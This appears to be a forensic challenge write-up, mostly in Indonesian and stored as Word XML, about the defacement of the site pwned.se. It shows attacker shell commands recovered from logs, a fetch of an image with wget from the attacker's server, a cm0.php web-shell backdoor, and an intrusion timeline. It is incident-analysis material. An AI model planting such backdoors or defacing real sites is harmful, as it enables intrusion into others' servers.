    <w:p w14:paraId="4D36B277" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669619C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;h1&gt;Password-Ned AB&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D28A78" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;p&gt;Your trusted source for secure passwords&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16ED8B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476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&lt;img src="/images/ned.jpg" alt="Password-Ned" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA3C011" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0C2C75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Ned Flanders is a person you can rely on, he has been in the business of supplying others with secure passwords for so long,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44126E01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to be called Password-Ned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212EC9D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C0B1D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&lt;li&gt;We generate secure passwords&lt;/l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18134DB3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&lt;li&gt;Passwords are delivered throgh secure channels to our customers&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379890BD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&lt;li&gt;A copy of each password is stored securely within our systems, as a back up service for our customers&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F56BCA" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C350903" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;div&gt;&lt;a href="/phpinfo/"&gt;phpinfo&lt;/a&gt; &lt;a href="/polarbea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rcms"&gt;cms&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A78FD5" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45ACC2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380141CE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>mv index.html youarearealdickheadandimlazercool.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23463F93" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>../skyblue/index.html .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5901A5AB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>../skyblue/fr.jpg .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2F3D84F6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622A429" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00AE15" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxrwxr-x. 2 root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>root  20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mar  6 12:04 images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672338C3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rwxrwxr-x. 1 root root 790 Mar 11 12:34 index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D458893" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476"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rwxrwxr-x. 1 root root   5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Mar  6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12:02 test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F955347" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>cat index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8CFDE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;meta http-equiv="refresh" content="0; url=/skyblue/" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B41E7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C14FB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DC7C2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;pwned.se - Password-Ned AB&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080550F2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF03DE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;h1&gt;Password-Ned AB&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28443F14" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476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&lt;p&gt;Your trusted source for secure passwords&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D34BD87" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>&lt;img src="/images/ned.jpg" alt="Password-Ned" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B57C706" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B0900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Ned Flanders is a person you can rely on, he has been in the business of supplying others with secure passwords for so long,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814F3FA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to be called Password-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E0B9C2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642F0AF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&lt;li&gt;We generate secure passwords&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01186609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&lt;li&gt;Passwords are delivered throgh secure channels to our customers&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F0F82" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476"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ab/>
        <w:t>&lt;li&gt;A copy of each password is stored securely within our systems, as a back up service for our customers&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2B675" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE8FBE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;div&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>a href="/phpinfo/"&gt;phpinfo&lt;/a&gt; &lt;a href="/polarbearcms"&gt;cms&lt;/a&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD372D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA9A4E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438E7DD3" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DD92D" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13015ECE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxrwxr-x. 3 root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>root  51</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mar 11 12:34 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369EB4F1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxr-xr-x. 6 root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>root  64</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mar 11 11:58 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01904C8F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">drwxrwxr-x. 2 root </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>root  20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mar  6 12:04 images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5B69C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-rwxrwxr-x. 1 root root 790 Mar 11 12:34 index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB3C09" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwxrwxr-x. 1 root root   5 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Mar  6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12:02 test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB27E9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="5BC6D076" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Terdapat banyak perintah, namun inti dari perintah-perintah tersebut adalah sang attacker melakukan defac</w:t>
      </w:r>
      <w:r>
        <w:t>e terhadap halaman /skyblue/index.html. Mereka melakukan linking pada file index.html dengan fr.html (yang hanya berisi gambar fr.jpg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75382F42" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="0779E281" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Questions &amp; Answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F31526" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F4C0A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>What IP address did the attackers use?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794F16E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>217.195.49.146</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FEBB9C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 1.2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027047C9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>How did the attacker get the fr.jpg file to the webserver?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287EA417" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Attacker mendownload gambar tersebut dengan menggunakan wget dari server miliknya sendiri.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69D76F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A75F9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Show how the web page looked after the defacement for URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.pwned.se/skyblue/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="750C9138" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="538DF180" wp14:editId="0776B0EB">
            <wp:extent cx="5731200" cy="4292600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="image04.png" descr="t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tes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2C0149" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="793A4121" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Gambar tersebut kami dapatkan dari attachment file yang ada pada email. Pada email kami menemukan bahwa admin pernah melakukan percakapan tentang hacking tersebut dan menyertakan beberapa screenshoot, beberapa g</w:t>
      </w:r>
      <w:r>
        <w:t>ambar lainnya kami sertakan dalam zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE199AE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="4BD18A71" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8EFE9" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Identify potential Backdoor and list all the commands the FrogSquad send during the incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D895D7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Potential backdoor: cm0.php, yang dapat menjalankan perintah-perintah di shell sesuai dengan request. Command-c</w:t>
      </w:r>
      <w:r>
        <w:t>ommand yang dijalankan sudah kami list semua di laporan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF90490" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="3830EFA4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Question 1.5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48662C90" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Lists the Total Dates and Times FrogSquad accessed </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.pwned.se</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12C85CD1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Kami melakukan bruteforce untuk mencari tanggal-tanggal berapa saja terjadi inter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aksi antara attacker dan pwned.se. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D82DD" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Cara yang kami lakukan adalah dengan melakukan filtering ip pada setiap paket pcap yang ada dengan bantuan bash script (seperti yang kami lakukan pada soal nomor 2 dibawah)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B20FF5" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Hasilnya adalah tanggal 12 Maret dan 13 Maret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B0245" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Rincian untuk tanggal 12 Maret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32E9DA" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>19:14:17: Attacker melakukan serangan pertama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254259C4" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>19:25:46: Attacker melakukan upload backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A7A8F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>19:31:19: Attacker mulai menggunakan backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCAF4B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>19:32:53:  Command terakhir backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079DA717" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>20:05:1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> interaksi SSH antara attacker dan pwned.</w:t>
      </w:r>
      <w:r>
        <w:t>se</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461FE4D6" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>22:00:01: akhir dari paket-paket attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509ACA85" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="5D5835EB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
